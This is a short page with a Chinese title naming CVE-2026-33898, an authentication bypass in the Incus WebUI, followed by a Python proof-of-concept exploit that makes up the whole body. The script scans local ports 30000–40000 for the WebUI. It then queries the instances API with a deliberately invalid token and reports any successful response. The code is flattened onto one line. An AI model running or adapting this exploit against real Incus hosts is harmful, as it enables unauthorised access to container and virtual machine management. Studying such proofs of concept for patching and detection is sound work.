CVE-2026-33898 Incus WebUI认证绕过漏洞

import requests import socket # Proof of Concept for CVE-2026-33898 # This script scans localhost for the Incus WebUI and attempts to bypass authentication. def find_incus_port(start_port=30000, end_port=40000): """Scan localhost for the potential Incus WebUI port.""" open_ports = [] for port in range(start_port, end_port): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) socket.setdefaulttimeout(0.5) result = sock.connect_ex(('127.0.0.1', port)) if result == 0: # Check if it looks like Incus WebUI (heuristic) try: response = requests.get(f'http://127.0.0.1:{port}', timeout=1) if 'Incus' in response.text or 'token' in response.text: open_ports.append(port) except: pass sock.close() except: continue return open_ports def exploit_auth_bypass(port): """Attempts to access the API using a malformed/invalid token.""" # The vulnerability accepts invalid tokens in the URL target_url = f'http://127.0.0.1:{port}/1.0/instances?auth=invalid_token_bypass' try: response = requests.get(target_url) if response.status_code == 200: print(f"[+] Potential Bypass Successful on port {port}!") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Failed on port {port}. Status: {response.status_code}") except Exception as e: print(f"[-] Error connecting to port {port}: {e}") return False if __name__ == "__main__": print("[*] Scanning for Incus WebUI...") ports = find_incus_port() if not ports: print("[*] No potential Incus WebUI ports found.") else: print(f"[*] Found potential ports: {ports}") for p in ports: exploit_auth_bypass(p)